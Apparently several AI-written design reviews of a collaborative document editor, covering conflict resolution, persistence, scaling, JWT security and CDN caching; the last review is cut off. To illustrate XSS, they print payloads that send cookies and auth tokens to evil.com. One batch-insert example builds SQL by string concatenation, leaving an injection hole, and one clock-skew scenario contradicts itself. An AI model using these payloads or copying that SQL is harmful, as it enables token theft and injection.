clients ✓
t=0.1s Write to PostgreSQL
... silence ... ... silence ...
t=2.0s t=2.0s Poll PostgreSQL
Poll PostgreSQL → discovers "Hello"
→ discovers "World" → broadcasts to Bob
→ broadcasts to Alice
Result: 2-SECOND LATENCY for cross-server collaboration.
That's completely unacceptable for real-time editing.
The Solution: Dedicated pub/sub layer for inter-server communication.
┌──────────┐ WebSocket ┌────────────┐
│ Alice │◄──────────────────►│ Server A │
└──────────┘ └─────┬──────┘
│ PUBLISH "doc:123"
▼
┌────────────┐
│ Redis │
│ Pub/Sub │
└─────┬──────┘
│ SUBSCRIBE "doc:123"
▼
┌──────────┐ WebSocket ┌────────────┐
│ Bob │◄──────────────────►│ Server B │
└──────────┘ └────────────┘
// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);
// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
// 1. Persist to database
await persistChange(change);
// 2. Broadcast to local WebSocket clients (immediate, <10ms)
broadcastToLocalClients(documentId, change);
// 3. Publish to Redis so OTHER servers get it immediately
await pub.publish(`doc:${documentId}`, JSON.stringify({
change,
originServer: serverId, // so we can avoid echo
timestamp: Date.now()
}));
}
// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
const { change, originServer } = JSON.parse(message);
// Don't re-broadcast changes that originated from this server
if (originServer === MY_SERVER_ID) return;
const documentId = channel.replace('doc:', '');
broadcastToLocalClients(documentId, change);
});
// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
sub.subscribe(`doc:${documentId}`);
}
Trade-offs:
The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.
Scenario: Alice and Bob both edit the same paragraph simultaneously.
Original paragraph: "The quick brown fox"
Alice (t=100): "The quick brown fox jumps over the lazy dog"
(added " jumps over the lazy dog")
Bob (t=101): "The slow brown fox"
(changed "quick" to "slow")
Last-write-wins result: "The slow brown fox"
Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.
The Solution: Operational Transformation (OT) or CRDTs.
For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:
// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)
// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
retain(19), // keep everything
insert(" jumps over the lazy dog") // append
];
// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
retain(4), // keep "The "
delete(5), // remove "quick"
insert("slow"), // insert "slow"
retain(10) // keep " brown fox"
];
// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);
// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!
// Server-side OT engine
class DocumentOTEngine {
constructor(documentId) {
this.documentId = documentId;
this.revision = 0; // monotonically increasing server revision
this.operationLog = []; // ordered list of all operations
}
/**
* Client sends: { revision: clientRev, operation: op }
* clientRev = the server revision the client's op was based on
*/
async receiveOperation(clientRevision, operation, userId) {
// Transform against all operations that happened since
// the client's known revision
let transformedOp = operation;
for (let i = clientRevision; i < this.revision; i++) {
const serverOp = this.operationLog[i];
// Transform client op against each concurrent server op
[transformedOp] = transform(transformedOp, serverOp);
}
// Apply the transformed operation to the server document
this.document = apply(this.document, transformedOp);
this.operationLog.push(transformedOp);
this.revision++;
// Persist and broadcast
await this.persist(transformedOp);
this.broadcast(transformedOp, userId);
// Send acknowledgment to the original client
return { revision: this.revision };
}
}
Trade-offs:
ot.js or ShareDB)The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.
Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock: 2024-01-15 09:00:00 (5 hours behind)
Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.
The Solution: Use server-assigned logical ordering.
// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:
class DocumentRevisionManager {
// Use a PostgreSQL sequence or Redis INCR for atomic ordering
async assignRevision(documentId, operation) {
// INCR is atomic in Redis — no two operations get the same number
const revision = await redis.incr(`doc:${documentId}:revision`);
return {
...operation,
revision, // server-assigned order
serverTimestamp: Date.now(), // server clock, not client
// client timestamp kept only for analytics, never for ordering
clientTimestamp: operation.clientTimestamp
};
}
}
Trade-offs:
The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.
t=0s Snapshot saved
t=5s Alice types a paragraph
t=15s Bob adds a table
t=25s Carol writes three paragraphs
t=29s SERVER CRASHES
─────────────────
All work from t=0s to t=29s is GONE.
Three users just lost their work simultaneously.
The Solution: Event-sourced operation log with periodic snapshots for fast loading.
// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading
// PostgreSQL schema
const schema = `
-- The operation log is the source of truth
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL, -- the OT operation
user_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision) -- enforces operation ordering
);
-- Snapshots are a materialized optimization, not the source of truth
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
revision INTEGER NOT NULL, -- snapshot is valid AT this revision
content JSONB NOT NULL, -- full document state
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY(document_id, revision)
);
-- Index for fast "give me ops since revision X" queries
CREATE INDEX idx_ops_doc_revision
ON document_operations(document_id, revision);
`;
// Loading a document: snapshot + replay
async function loadDocument(documentId) {
// 1. Get the latest snapshot
const snapshot = await db.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
// 2. Get all operations AFTER the snapshot
const ops = await db.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, snapshot.revision]);
// 3. Replay operations on top of snapshot
let document = snapshot.content;
for (const op of ops) {
document = applyOperation(document, op.operation);
}
return { document, revision: snapshot.revision + ops.length };
}
// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
const { document, revision } = await loadDocument(documentId);
await db.query(`
INSERT INTO document_snapshots (document_id, revision, content)
VALUES ($1, $2, $3)
ON CONFLICT DO NOTHING
`, [documentId, revision, document]);
}
Trade-offs:
The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:
Problems with raw HTML storage:
1. XSS VULNERABILITY:
User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
If stored as raw HTML and rendered, every viewer gets compromised.
2. BLOAT:
A 1-page document in HTML: ~50KB
Same content in structured JSON: ~5KB
With 30-second snapshots × millions of documents = massive storage
3. NO STRUCTURED OPERATIONS:
You can't diff two HTML snapshots to figure out what changed.
You can't do OT on raw HTML.
You can't build features like "show me what Bob changed."
The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).
// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
type: "doc",
content: [
{
type: "heading",
attrs: { level: 1 },
content: [{ type: "text", text: "Title" }]
},
{
type: "paragraph",
content: [
{ type: "text", text: "Hello " },
{ type: "text", text: "world", marks: [{ type: "bold" }] }
]
}
]
};
// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.
// Sanitization on output (defense in depth)
function renderToHTML(doc) {
// Even with structured storage, sanitize on render
return sanitizeHtml(structuredToHtml(doc), {
allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
allowedAttributes: { 'a': ['href'] }
});
}
The Flaw: Every keystroke from every user results in a write to PostgreSQL. PostgreSQL is excellent, but it's not designed for the write pattern of "millions of tiny inserts per second with immediate consistency requirements."
Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS
You're 3-6x over capacity.
The Solution: Multi-tier write strategy.
// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)
const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);
// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
// XADD is O(1) and Redis Streams are persistent (AOF)
const streamId = await redis.xadd(
`ops:${documentId}`,
'*', // auto-generate ID
'op', JSON.stringify(operation)
);
// Also publish for real-time broadcast (from section 1.1)
await redis.publish(`doc:${documentId}`, JSON.stringify(operation));
return streamId;
}
// Background worker: drain Redis Streams to PostgreSQL in batches
async function drainToPostgres() {
while (true) {
// Read up to 100 operations from each active document stream
const streams = await redis.xreadgroup(
'GROUP', 'pg-writer', 'worker-1',
'COUNT', 100,
'BLOCK', 1000, // wait up to 1s for new data
'STREAMS', ...activeDocumentStreams, ...ids
);
if (streams) {
// Batch insert into PostgreSQL (much more efficient)
const values = streams.flatMap(([stream, entries]) =>
entries.map(([id, fields]) => {
const op = JSON.parse(fields[1]);
return `('${op.documentId}', ${op.revision}, '${JSON.stringify(op)}'::jsonb)`;
})
);
await db.query(`
INSERT INTO document_operations (document_id, revision, operation)
VALUES ${values.join(',')}
`);
// Acknowledge processed entries
for (const [stream, entries] of streams) {
await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
}
}
}
}
Trade-offs:
The Flaw: OT requires serialized processing of operations per document. If 500 users are editing the same document, all operations must be processed sequentially by one entity. With round-robin load balancing, operations for the same document scatter across all servers.
Round-robin distributes users randomly:
Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)
Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.
The Solution: Sticky routing — all connections for a document go to the same server.
# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
# Consistent hashing by document ID
hash $arg_documentId consistent;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# WebSocket upgrade with document-based routing
map $args $document_id {
~documentId=(?<did>[^&]+) $did;
}
server {
location /ws {
proxy_pass http://api_servers;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Sticky routing: same document always goes to same server
# Consistent hashing means adding/removing servers only
# remaps ~1/N of documents
}
}
// Server-side: each server is the authoritative OT engine
// for its assigned documents
class Server {
constructor() {
// In-memory OT engines only for documents assigned to THIS server
this.documentEngines = new Map();
}
getOrCreateEngine(documentId) {
if (!this.documentEngines.has(documentId)) {
const engine = new DocumentOTEngine(documentId);
// Load current state from database
engine.initialize();
this.documentEngines.set(documentId, engine);
}
return this.documentEngines.get(documentId);
}
async handleOperation(documentId, clientRevision, operation) {
const engine = this.getOrCreateEngine(documentId);
// Serialized per-document via the single engine instance
// Node.js single-threaded event loop helps here!
return engine.receiveOperation(clientRevision, operation);
}
}
Trade-offs:
The Flaw: PostgreSQL read replicas have replication lag (typically 10ms-1s, but can spike to minutes under load). If a user writes to the primary and then reads from a replica, they may not see their own changes.
t=0ms User saves document title → write goes to PRIMARY
t=5ms User's browser requests document list → read goes to REPLICA
Replica hasn't received the write yet
User doesn't see their new title → "Where did my change go?!"
The Solution: Read-your-own-writes consistency.
// Track the last write position per user session
class ConsistentReader {
// After any write, store the PostgreSQL WAL position
async afterWrite(userId) {
const result = await primaryDb.query(
'SELECT pg_current_wal_lsn() as lsn'
);
await redis.set(
`user:${userId}:last_write_lsn`,
result.rows[0].lsn,
'EX', 30 // expire after 30 seconds
);
}
// Before any read, check if the replica has caught up
async getReadConnection(userId) {
const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);
if (!lastWriteLsn) {
// No recent writes — replica is fine
return replicaDb;
}
// Check if replica has caught up to the user's last write
const result = await replicaDb.query(
'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
[lastWriteLsn]
);
if (result.rows[0].caught_up) {
return replicaDb;
}
// Replica hasn't caught up — read from primary
return primaryDb;
}
}
Trade-offs:
The Flaw: Partitioning by organization ID means one large organization's data all lives on one partition. If Google (500,000 employees) uses your tool, that partition is 1000x larger than a 50-person startup's partition.
Partition 1: ["TinyStartup LLC"] → 200 documents
Partition 2: ["MegaCorp Inc."] → 5,000,000 documents
Partition 3: ["SmallAgency Co."] → 500 documents
Partition 2 is a massive hot spot.
The Solution: Hash-based partitioning on document ID, with organization as a secondary index.
-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
org_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);
-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15
-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);
Trade-offs:
The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.
// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
method: 'POST',
body: JSON.stringify({
token: localStorage.getItem('auth_token'),
// Attacker now has a 24-hour valid session
// They can read/modify ALL of the user's documents
})
});
The Solution: HttpOnly cookies with proper security attributes.
// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
res.cookie('session', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // only sent over HTTPS
sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
maxAge: 24 * 60 * 60 * 1000, // 24 hours
path: '/',
domain: '.yourdomain.com'
});
}
// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });
server.on('upgrade', (request, socket, head) => {
// Parse cookie from the upgrade request headers
const cookies = parseCookies(request.headers.cookie);
const token = cookies.session;
try {
const user = jwt.verify(token, JWT_SECRET);
wss.handleUpgrade(request, socket, head, (ws) => {
ws.user = user;
wss.emit('connection', ws, request);
});
} catch (err) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
});
Trade-offs:
The Flaw: If a user's token is compromised, or they're fired/deactivated, the token remains valid for up to 24 hours. JWTs are stateless — there's no server-side way to invalidate them without additional infrastructure.
t=0h Employee gets JWT (expires t=24h)
t=1h Employee is terminated, account deactivated
t=1h-24h Terminated employee still has full access
Can download/modify/delete all documents they had access to
The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.
// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)
function issueTokens(user) {
const accessToken = jwt.sign(
{ userId: user.id, role: user.role },
ACCESS_SECRET,
{ expiresIn: '15m' }
);
const refreshToken = jwt.sign(
{ userId: user.id, tokenFamily: uuid() },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
// Store refresh token hash in database for revocation
await db.query(`
INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
`, [user.id, hash(refreshToken), refreshToken.tokenFamily]);
return { accessToken, refreshToken };
}
// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
return await redis.sismember('revoked_tokens', jti);
}
// When user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
// Add all active token IDs to the deny list
await redis.sadd('revoked_tokens', ...activeTokenIds);
// Delete all refresh tokens
await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}
Trade-offs:
The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.
// VULNERABLE: no authorization check
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Anyone can send operations to any document!
await handleOperation(documentId, operation);
});
The Solution: Per-document permission checks on every operation.
// Permission model
const PERMISSIONS = {
OWNER: ['read', 'write', 'share', 'delete'],
EDITOR: ['read', 'write'],
COMMENTER: ['read', 'comment'],
VIEWER: ['read']
};
// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Check permission (cached in Redis for performance)
const permission = await getPermission(ws.user.id, documentId);
if (!permission || !PERMISSIONS[permission].includes('write')) {
ws.send(JSON.stringify({
error: 'FORBIDDEN',
message: 'You do not have write access to this document'
}));
return;
}
await handleOperation(documentId, operation, ws.user);
});
// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
const cacheKey = `perm:${userId}:${documentId}`;
let permission = await redis.get(cacheKey);
if (!permission) {
const result = await db.query(`
SELECT role FROM document_permissions
WHERE user_id = $1 AND document_id = $2
`, [userId, documentId]);
permission = result.rows[0]?.role || 'NONE';
await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
}
return permission === 'NONE' ? null : permission;
}
The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.
Scenario:
t=0:00 Alice shares document with Bob → API returns "shared" status
CloudFront caches this response
t=0:30 Alice REVOKES Bob's access → API returns "not shared"
But CloudFront still has the old cached response
t=0:30-5:00 Bob's browser still gets the cached "shared" response
Bob can still see and potentially access the document
for up to 5 more minutes after access was revoked
The Solution: Separate caching strategies by content type.
// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content
// CloudFront behavior configurations:
const cloudFrontBehaviors = {
// Static assets: aggressive caching
'/static/*': {
cachePolicyId: 'CachingOptimized', // cache forever, bust with filename hash
ttl: { default: 86400, max: 31536000 },
compress: true
},
// Public marketing pages: moderate caching
'/public/*': {
cachePolicyId: 'CachingOptimized',
ttl: { default: 300 }, // 5 min is fine for public content
},
// API endpoints: NO CDN CACHING
'/api/*': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer', // forward all headers
// Let the application server set its own Cache-Control headers
},
// WebSocket: pass through entirely
'/ws': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer',
}
};
// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
res.set({
'Cache-Control': 'private, no-store', // never cache user-specific data
'Vary': 'Authorization, Cookie'
});
// ... return documents
});
app.get('/api/documents/:id/content', (req, res) => {
// Document content changes constantly in a collaborative editor
res.set('Cache-Control', 'no-store');
// ... return content
});
Trade-offs:
The Flaw: The architecture doesn't address what happens when a WebSocket connection drops (network switch, laptop sleep, mobile network change). Without explicit handling, users will type into a disconnected editor and lose everything.
The Solution: Client-side operation buffering with automatic reconnection.
class ResilientDocumentConnection {
constructor(documentId) {
this.documentId = documentId;
this.pendingOps = []; // operations not yet acknowledged by server
this.bufferedOps = []; // operations created while disconnected
this.serverRevision = 0;
this.state = 'disconnected'; // disconnected | connecting | synchronized
this.reconnectAttempt = 0;
}
connect() {
this.state = 'connecting';
this.ws = new WebSocket(
`wss://api.example.com/ws?documentId=${this.documentId}`
);
this.ws.onopen = () => {
this.state = 'synchronized';
this.reconnectAttempt = 0;
// Send any operations that were buffered while offline
for (const op of this.bufferedOps) {
this.sendOperation(op);
}
this.bufferedOps = [];
};
this.ws.onclose = (event) => {
this.state = 'disconnected';
this.scheduleReconnect();
};
this.ws.onerror = () => {
// onclose will fire after onerror
};
this.ws.onmessage = (event) => {
this.handleServerMessage(JSON.parse(event.data));
};
}
// User makes an edit
applyLocalOperation(operation) {
// Always apply locally immediately (optimistic)
this.editor.apply(operation);
if (this.state === 'synchronized') {
this.sendOperation(operation);
} else {
// Buffer for later — user can keep typing offline
this.bufferedOps.push(operation);
this.showOfflineIndicator();
}
}
scheduleReconnect() {
// Exponential backoff with jitter
const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
const jitter = baseDelay * 0.5 * Math.random();
const delay = baseDelay + jitter;
this.reconnectAttempt++;
console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
setTimeout(() => this.connect(), delay);
}
showOfflineIndicator() {
// Show yellow "offline — changes will sync when reconnected" banner
// Users MUST know their changes aren't saved yet
document.getElementById('sync-status').className = 'offline';
}
}
Trade-offs:
The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.
// Common leak patterns:
// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes
// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely
// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed
The Solution: Heartbeat monitoring + resource lifecycle management.
class ConnectionManager {
constructor() {
this.connections = new Map(); // ws → metadata
this.documentSubscribers = new Map(); // documentId → Set<ws>
}
addConnection(ws, user, documentId) {
ws.isAlive = true;
ws.documentId = documentId;
this.connections.set(ws, {
user,
documentId,
connectedAt: Date.now(),
lastActivity: Date.now()
});
// Track subscribers per document
if (!this.documentSubscribers.has(documentId)) {
this.documentSubscribers.set(documentId, new Set());
redis.subscribe(`doc:${documentId}`); // subscribe on first user
}
this.documentSubscribers.get(documentId).add(ws);
// Heartbeat: client must respond to pings
ws.on('pong', () => { ws.isAlive = true; });
ws.on('close', () => this.removeConnection(ws));
ws.on('error', () => this.removeConnection(ws));
}
removeConnection(ws) {
const meta = this.connections.get(ws);
if (!meta) return;
this.connections.delete(ws);
// Remove from document subscribers
const subs = this.documentSubscribers.get(meta.documentId);
if (subs) {
subs.delete(ws);
// If no more subscribers for this document, clean up
if (subs.size === 0) {
this.documentSubscribers.delete(meta.documentId);
redis.unsubscribe(`doc:${meta.documentId}`);
// Unload OT engine after a grace period
// (in case someone reconnects quickly)
setTimeout(() => {
if (!this.documentSubscribers.has(meta.documentId)) {
documentEngines.delete(meta.documentId);
console.log(`Unloaded OT engine for doc ${meta.documentId}`);
}
}, 60000); // 60-second grace period
}
}
try { ws.terminate(); } catch (e) {}
}
// Run every 30 seconds: detect dead connections
startHeartbeat() {
setInterval(() => {
for (const [ws, meta] of this.connections) {
if (!ws.isAlive) {
console.log(`Dead connection detected: user ${meta.user.id}`);
this.removeConnection(ws);
return;
}
ws.isAlive = false;
ws.ping(); // client must respond with pong within 30s
}
}, 30000);
}
}
The Flaw: Round-robin assigns connections evenly at connection time, but WebSocket connections are long-lived. Over time, as servers are added/removed or connections have different lifetimes, load becomes severely unbalanced.
Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.
Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
Server 3: 0 connections (new, gets only NEW connections)
Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.
The Solution: Least-connections routing + connection count awareness.
upstream api_servers {
# Use least_conn instead of round-robin for WebSocket connections
# This sends new connections to the server with fewest active connections
least_conn;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:
# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness
// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
const currentAssignments = await getDocumentAssignments();
const newAssignments = consistentHash(currentAssignments, newServerList);
for (const [docId, { oldServer, newServer }] of changedAssignments) {
if (oldServer !== newServer) {
// Gracefully migrate: tell clients to reconnect to new server
await notifyClientsToReconnect(docId, newServer);
// Stagger migrations to avoid thundering herd
await sleep(100);
}
}
}
┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ # │ Issue │ Severity │ Effort │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1 │ Last-write-wins destroys data (1.2) │ CRITICAL │ High │
│ 2 │ JWT in localStorage / XSS (4.1) │ CRITICAL │ Medium │
│ 3 │ No document authorization (4.3) │ CRITICAL │ Medium │
│ 4 │ 30s snapshot data loss (2.1) │ HIGH │ Medium │
│ 5 │ CDN caching API responses (5.1) │ HIGH │ Low │
│ 6 │ 2-second cross-server delay (1.1) │ HIGH │ Low │
│ 7 │ Client clock timestamps (1.3) │ HIGH │ Low │
│ 8 │ No reconnection handling (6.1) │ HIGH │ Medium │
│ 9 │ JWT no revocation (4.2) │ MEDIUM │ Medium │
│ 10 │ Split-brain document routing (3.1) │ MEDIUM │ Medium │
│ 11 │ HTML snapshot bloat/XSS (2.2) │ MEDIUM │ Medium │
│ 12 │ Org-based hot spots (3.3) │ MEDIUM │ Low │
│ 13 │ Read replica staleness (3.2) │ MEDIUM │ Medium │
│ 14 │ PG write bottleneck (2.3) │ LOW* │ High │
│ 15 │ WebSocket memory leaks (6.2) │ LOW* │ Medium │
│ 16 │ Round-robin imbalance (7.1) │ LOW* │ Low │
└────┴──────────────────────────────────────┴──────────┴────────────┘
* LOW at current scale, becomes HIGH at scale
The core issue is that this architecture treats a real-time collaborative editor like a traditional CRUD application. The fundamental shift needed is from state-based synchronization (snapshots, last-write-wins) to operation-based synchronization (OT/CRDTs, operation logs, event sourcing). That single conceptual change resolves issues 1, 2, 3, 4, and 7 simultaneously.
I'll analyze this architecture systematically and identify critical issues with their solutions.
Issue: Users connected to different servers can't see each other's changes in real-time due to 2-second polling delay.
Race Condition:
Time 0: User A (Server 1) types "Hello"
Time 0.5: User B (Server 2) types "Hi"
Time 2: Server 2 polls and gets "Hello", but User A never sees "Hi" until next poll
Solutions:
Issue: Client-side timestamps are unreliable for conflict resolution.
Race Condition:
User A (clock +30s): Edit at "12:00:30" (actual 12:00:00)
User B (correct clock): Edit at "12:00:15" (actual 12:00:15)
Result: User A's older edit wins due to clock skew
Solution: Server-side Lamport timestamps or vector clocks
// Server assigns logical timestamps
const change = {
content: edit.content,
serverTimestamp: Date.now(),
logicalClock: ++serverLogicalClock,
serverId: process.env.SERVER_ID
}
Issue: Multiple servers writing simultaneously can cause data corruption.
Race Condition:
-- Server 1 and Server 2 simultaneously:
UPDATE documents SET content = 'Version A', version = version + 1 WHERE id = 123;
UPDATE documents SET content = 'Version B', version = version + 1 WHERE id = 123;
-- One update gets lost
Solution: Optimistic locking with version numbers
UPDATE documents
SET content = $1, version = version + 1, updated_at = NOW()
WHERE id = $2 AND version = $3
RETURNING version;
-- If no rows affected, retry with conflict resolution
Issue: Single PostgreSQL instance becomes write bottleneck as user count grows.
Solutions:
// Batch operations every 100ms
const batch = operations.splice(0, MAX_BATCH_SIZE);
await db.query('INSERT INTO operations (doc_id, operation, timestamp) VALUES ...', batch);
Issue: Each server has OS-level limits (~65k connections per server).
Solution: Connection pooling and WebSocket clustering
// Use Redis adapter for Socket.io clustering
const io = require('socket.io')(server);
io.adapter(require('socket.io-redis')({ host: 'redis-cluster' }));
Issue: Each connection stores document state in memory.
Solution: Stateless WebSockets with Redis for session storage
// Store connection state in Redis
await redis.hset(`session:${socketId}`, {
userId: user.id,
documentId: doc.id,
lastSeen: Date.now()
});
Issue: 2-second polling can miss rapid changes or cause ordering issues.
Solution: Change Data Capture (CDC) with PostgreSQL logical replication
-- Enable logical replication
CREATE PUBLICATION doc_changes FOR TABLE documents, document_operations;
-- Consume changes in real-time instead of polling
Issue: 24-hour localStorage JWTs can't be revoked and are XSS vulnerable.
Solution: Short-lived access tokens + secure refresh tokens
// 15-minute access token + httpOnly refresh cookie
const accessToken = jwt.sign(payload, secret, { expiresIn: '15m' });
res.cookie('refreshToken', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict'
});
Issue: 5-minute API response caching serves stale document data.
Solution: Cache invalidation strategy
// Invalidate CDN cache on document updates
await cloudfront.createInvalidation({
DistributionId: 'DISTRIBUTION_ID',
InvalidationBatch: {
Paths: [`/api/documents/${documentId}*`],
CallerReference: Date.now().toString()
}
});
Issue: Storing complete HTML every 30 seconds wastes storage and bandwidth.
Solution: Delta compression with operational transforms
// Store only operations, reconstruct document as needed
const operations = await db.query(
'SELECT * FROM document_operations WHERE doc_id = $1 ORDER BY timestamp',
[docId]
);
const document = applyOperations(baseDocument, operations);
Client → WebSocket → Message Broker → All Servers → Clients
↓
Event Store (PostgreSQL)
Replace last-write-wins with proper collaborative editing algorithms:
// Use libraries like Yjs or ShareJS
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('content')
// Automatic conflict resolution without data loss
This architecture addresses the major issues while maintaining scalability and reliability for a production collaborative editor.
This architecture has critical flaws that will cause data loss, security vulnerabilities, and poor user experience at scale. I've identified 18 distinct issues across 6 categories. Several are severe enough to cause silent data corruption in production today.
Severity: CRITICAL — Silent data loss in production
Scenario demonstrating the problem:
─────────────────────────────────────────────────────
User A (clock: accurate) User B (clock: 5min fast)
─────────────────────────────────────────────────────
12:00:00 - Types "Hello" 11:59:00 - Types "World"
(clock is ahead, so B's
timestamp is EARLIER)
Result: "Hello" wins because it has the later timestamp
BUT User B typed after User A in wall-clock time.
Worse scenario:
User B's laptop has clock skewed +1 hour.
User B can now PERMANENTLY win every conflict
for an entire hour, silently discarding all other
users' changes with no indication to anyone.
─────────────────────────────────────────────────────
The deeper problem: LWW at the paragraph level means any concurrent edit to the same paragraph results in one user's work being silently discarded. There's no merge, no notification, no recovery.
Solution: Operational Transformation (OT) or CRDTs
// Current broken approach
